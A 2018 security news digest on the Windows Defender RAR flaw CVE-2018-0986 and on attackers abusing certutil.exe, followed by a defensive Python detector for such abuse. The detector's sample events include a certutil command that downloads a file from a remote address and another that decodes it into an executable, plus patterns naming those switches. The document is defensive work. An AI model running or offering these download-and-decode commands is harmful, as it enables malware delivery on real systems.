Delaware, USA – April 5, 2018 – Another emergency update has been released to fix a critical vulnerability in the Microsoft Malware Protection Engine (MMPE). MMPE is a component of several Microsoft security products, including Windows Defender, which is enabled by default in Windows 10. The vulnerability allows an attacker to execute malicious code on the victim's system. To compromise a system, it is enough to send the victim a specially crafted RAR archive by email or to have the archive downloaded from a web page; scanning such a file with a vulnerable Microsoft anti-virus engine can lead to code execution with LocalSystem privileges. The vulnerability, CVE-2018-0986, is fixed in MMPE version 1.1.14700.5. The update is installed automatically and requires no user interaction, but it is advisable to verify that your security policies do not block MMPE engine updates.
It is also worth noting that security researcher Xavier Mertens published a note on how cybercriminals can bypass security solutions by abusing the legitimate Windows certutil.exe tool. Last week we wrote about a similar technique used to deliver the Sanny infostealer, and F5 reported a campaign distributing Electroneum cryptocurrency miners that also uses certutil.exe for malware delivery.
To monitor security events on Windows-based systems, you can leverage your SIEM together with the Windows Security Monitor use case, which performs statistical analysis and profiling of Windows and Active Directory events to detect anomalies and suspicious activity.
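As an added illustration of the certutil.exe abuse described above and of the kind of process-creation profiling a SIEM use case performs, here is a small Python detector (example code written for this digest, not part of the Windows Security Monitor use case or any vendor product). It scores constructed Windows 4688-style process-creation events for certutil launches with download or decode switches, remote URLs, or unusual parent processes, and builds a per-user launch baseline; hosts, users, paths and the IP address in the sample events are all made up.

```python
import re
from collections import Counter
# Constructed process-creation events (event 4688 / Sysmon 1 reduced to SIEM fields); not real data.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice", "parent": "explorer.exe",
     "cmd": r'"C:\Windows\System32\certutil.exe" -addstore Root corp-ca.cer'},
    {"host": "WS02", "user": "bob", "parent": "winword.exe",
     "cmd": r"certutil.exe -urlcache -split -f http://198.51.100.7/u.txt C:\Users\bob\AppData\Local\Temp\u.txt"},
    {"host": "WS02", "user": "bob", "parent": "cmd.exe",
     "cmd": r"certutil -decode C:\Users\bob\AppData\Local\Temp\u.txt C:\Users\bob\AppData\Local\Temp\u.exe"},
    {"host": "WS03", "user": "svc_pki", "parent": "services.exe",
     "cmd": r"C:\Windows\System32\certutil.exe -pulse"},
]

# Switches that make certutil fetch or base64-decode files, and parent images an admin would not run it from.
CERTUTIL = ("certutil.exe", "certutil")
SUSPICIOUS_SWITCH = re.compile(r"(?i)[-/](urlcache|verifyctl|decode|encode)\b")
REMOTE_URL = re.compile(r"(?i)\bhttps?://\S+")
USER_LAND_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                     "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}

def image_name(cmd):
    """Basename of the launched executable, tolerating quotes and full paths."""
    first = cmd.split()[0].strip('"')
    return first.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons) for one event; anything but certutil scores 0."""
    if image_name(ev["cmd"]) not in CERTUTIL:
        return 0, []
    findings = []
    if m := SUSPICIOUS_SWITCH.search(ev["cmd"]):
        findings.append((2, "switch " + m.group(0)))
    if REMOTE_URL.search(ev["cmd"]):
        findings.append((2, "remote URL on command line"))
    if ev["parent"].lower() in USER_LAND_PARENTS:
        findings.append((1, "parent " + ev["parent"]))
    return sum(p for p, _ in findings), [r for _, r in findings]

def detect(events, threshold=2):
    """Events scoring at or above threshold, as (host, user, score, reasons)."""
    scored = ((ev, *score_event(ev)) for ev in events)
    return [(ev["host"], ev["user"], s, r) for ev, s, r in scored if s >= threshold]

def certutil_launches_per_user(events):
    """Baseline for profiling: how often each user launches certutil at all."""
    users = [ev["user"] for ev in events if image_name(ev["cmd"]) in CERTUTIL]
    return dict(Counter(users))
```

The two WS02 events are flagged while the routine certificate-store and service launches are not; the per-user counts feed the kind of baseline a profiling rule compares new activity against.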